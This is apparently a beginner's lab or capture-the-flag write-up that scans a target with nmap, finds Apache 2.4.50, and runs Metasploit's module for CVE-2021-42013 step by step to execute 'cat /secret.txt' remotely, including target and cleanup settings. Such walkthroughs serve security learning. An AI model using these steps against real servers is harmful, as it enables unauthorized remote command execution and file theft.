nmap -sS -sV <ipadress>then we see the output:
Nmap output
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) 80/tcp open http Apache httpd 2.4.50 ((Unix))
as we can see the server uses http protocol which means 80 port and the version is Apache httpd 2.4.50 (Unix) so my next step is going to be research the common vulnerabilities exploits CVE s for this version. So i opened the metasploit on my terminal
msfconsole
then we search with the search command and then find the CVE-2021-42013 exploit
after finding it we use the use command use multi/http/apache_normalize_path_rce
then we see the options that are required for the exploit with options command but as a RTFM person we always launch the info command first then we launch set commands for lhost rhosts and rport on msfconsole
set RHOSTS ipadressvictim
set RPORT 80 **(for http)**
set LHOST ipadresatackersince the connection is not a secure one it does not use tls ssl so we set ssl false
if you try to run the exploit won't work because it is not vulnerable to a remote session
so we change the target auto to target unix command
set target <targetid>
for this cve id 1 is the unix command target
set target 1
after we set the target we reopen the options section and we see cmd as required option for this lab we only need to read secret.txt file
set CMD cat /secret.txt
we re all set only thing we have to do is run the exploit and the output should write after the execution of the payload
You may have encountered Exploit failed: cmd/unix/generic cannot cleanup files created during exploit. To run anyway, set AllowNoCleanup to true
in this case just set allownocleanup true and you are good to go.
Thanks for reading my first write-up.